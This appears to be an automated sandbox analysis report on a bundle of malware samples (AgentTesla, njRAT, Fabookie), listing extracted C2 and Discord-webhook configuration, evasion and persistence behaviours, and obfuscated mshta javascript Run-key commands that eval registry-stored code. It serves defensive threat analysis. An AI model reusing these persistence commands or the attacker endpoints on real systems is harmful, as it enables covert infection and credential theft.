agenttesla | 5695a75d96e56497ab5f7175d5c1da59a4565df668cb89db774eefbb5bfb6cf5

Resubmissions

05-09-2023 01:34

230905-by5lrsch46 10

Analysis

max time kernel
528s
max time network
1679s
platform
windows10-2004_x64
resource
win10v2004-20230831-en
resource tags

arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
submitted
05-09-2023 01:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2023-09-04.zip
Size

299.5MB
MD5

eea227737face033b823122d906dabed
SHA1

a35c1ae86ff0aa50fb2b1e941c9b35f711c354bd
SHA256

5695a75d96e56497ab5f7175d5c1da59a4565df668cb89db774eefbb5bfb6cf5
SHA512

99d7bf96ba029cd723671754bae514200697806a0fa32eeb3a7cf6e7237d30e51987bea15b31932b08de0b4332c4ba0d5e4a71283a5574d4780d593510b8d760
SSDEEP

6291456:QH0GuwBg8s1enBP7CXaDOl7R0Y/2f9Jzwnq92kYqYnLxyRPI:QK8UenRLK2fDz3bWn1yFI

Score

10^/10

agenttesla fabookie njrat svchost.exe collection discovery evasion keylogger persistence spyware stealer trojan upx

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

svchost.exe

5.tcp.eu.ngrok.io:15312

Mutex

0c7caa8c30ecac23145985ecdefb5649

Attributes

reg_key
0c7caa8c30ecac23145985ecdefb5649
splitter
|'|'|

Extracted

Family

agenttesla

https://discordapp.com/api/webhooks/1141171534019436636/rsmn69Lcmg35Ga7bqVUGtuetk3b-HNiKLnmDMzvt91gHtESYIARmGI9pQQxxg2F5Q3mM

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/1400-1884-0x0000000004AF0000-0x0000000004C21000-memory.dmp	family_fabookie
behavioral1/memory/1400-2121-0x0000000004AF0000-0x0000000004C21000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Looks for VirtualBox Guest Additions in registry 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	svchost.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	svchost.exe

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:yBWN8txbc=\"Wt\";w6P=new%20ActiveXObject(\"WScript.Shell\");Y61yJkLW=\"1ua1yH8jy\";BW18iC=w6P.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e2e0f7a1\\\\84488b81\");xdZC6lK3=\"vAgwnU8TK\";eval(BW18iC);DoCczC1h=\"WHM2y5Pes\";"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	svchost.exe

Contacts a large (843) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file

Looks for VMWare Tools registry key 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools	svchost.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	svchost.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
4196	netsh.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Control Panel\International\Geo\Nation	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c7caa8c30ecac23145985ecdefb5649.exe	yatvoumatyxyebal.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c7caa8c30ecac23145985ecdefb5649.exe	yatvoumatyxyebal.exe

Executes dropped EXE 28 IoCs

pid	Process
4404	0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe
4192	0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe
2656	2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe
4576	yatvoumatyxyebal.exe
1400	5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe
4652	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
896	6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe
3876	7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe
4672	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
928	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
2860	38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
3176	49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
4952	38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe
4148	svchost.exe
3876	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe
1768	49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
1532	56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe
4676	74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe
5092	ufclwciske.exe
2516	ufclwciske.exe
4948	491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe
4532	ChromeClose.exe
4816	689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe
4596	7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe
2716	9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe
1844	Caspol.exe
2084	9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
2928	56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe

Loads dropped DLL 6 IoCs

pid	Process
4652	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
3376	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
4596	7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe
2716	9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe
2084	9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
2084	9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000233cc-928.dat	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c7caa8c30ecac23145985ecdefb5649 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\yatvoumatyxyebal.exe\" .."	yatvoumatyxyebal.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\0c7caa8c30ecac23145985ecdefb5649 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\yatvoumatyxyebal.exe\" .."	yatvoumatyxyebal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\""	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:yrUCfsab1=\"nvnujP\";uq31=new%20ActiveXObject(\"WScript.Shell\");qUz4oja=\"WRL\";Z1ekW0=uq31.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\e2e0f7a1\\\\84488b81\");Rk0gQjh5fa=\"Yz6RH65\";eval(Z1ekW0);oaF7HEzr3I=\"0iPOPSc8J\";"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:zFq6OsWG6=\"fiBlM\";uC0=new%20ActiveXObject(\"WScript.Shell\");b4gyFzc=\"dIvGD\";tBD2i2=uC0.RegRead(\"HKCU\\\\software\\\\e2e0f7a1\\\\84488b81\");Z6SwqRE2=\"i4bYu4g\";eval(tBD2i2);WxDaBAS8b=\"VbZ2yA\";"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1037	api.ipify.org
583	api.ipify.org
584	api.ipify.org
700	checkip.dyndns.org
1036	api.ipify.org

Maps connected drives based on registry 3 TTPs 6 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	svchost.exe

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	yatvoumatyxyebal.exe
File opened for modification	C:\autorun.inf	yatvoumatyxyebal.exe
File created	D:\autorun.inf	yatvoumatyxyebal.exe
File created	F:\autorun.inf	yatvoumatyxyebal.exe
File opened for modification	F:\autorun.inf	yatvoumatyxyebal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3376	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4652	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe
3376	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 2860 set thread context of 4952	2860	38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe	129
PID 2656 set thread context of 4172	2656	2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe	147
PID 4652 set thread context of 3376	4652	06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe	150
PID 4672 set thread context of 3876	4672	9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe	157
PID 5092 set thread context of 2516	5092	ufclwciske.exe	170
PID 2516 set thread context of 3232	2516	ufclwciske.exe	44
PID 4948 set thread context of 4248	4948	491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe	172
PID 2516 set thread context of 3232	2516	ufclwciske.exe	44
PID 1044 set thread context of 3232	1044	systray.exe	44
PID 1844 set thread context of 2084	1844	Caspol.exe	182
PID 1532 set thread context of 2928	1532	56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe	187

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4536	3876	WerFault.exe	124
4448	988	WerFault.exe	196

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x0006000000023258-2911.dat	nsis_installer_1
behavioral1/files/0x0006000000023258-2911.dat	nsis_installer_2
behavioral1/files/0x000600000002326c-2915.dat	nsis_installer_1
behavioral1/files/0x000600000002326c-2915.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4536	schtasks.exe
2668	schtasks.exe
1320	schtasks.exe
4992	schtasks.exe
5684	schtasks.exe
5196	schtasks.exe
2844	schtasks.exe
544	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
5032	timeout.exe
3240	timeout.exe
208	timeout.exe
5764	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1976	ipconfig.exe
4868	ipconfig.exe
2556	NETSTAT.EXE

Modifies Internet Explorer settings 1 TTPs 11 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\International	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0"	svchost.exe

Modifies registry class 50 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Documents"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings	49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e80922b16d365937a46956b92703aca08af260001002600efbe11000000b32dd5d24fdcd90124472bd55adcd90124472bd55adcd90114000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000020000000300000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
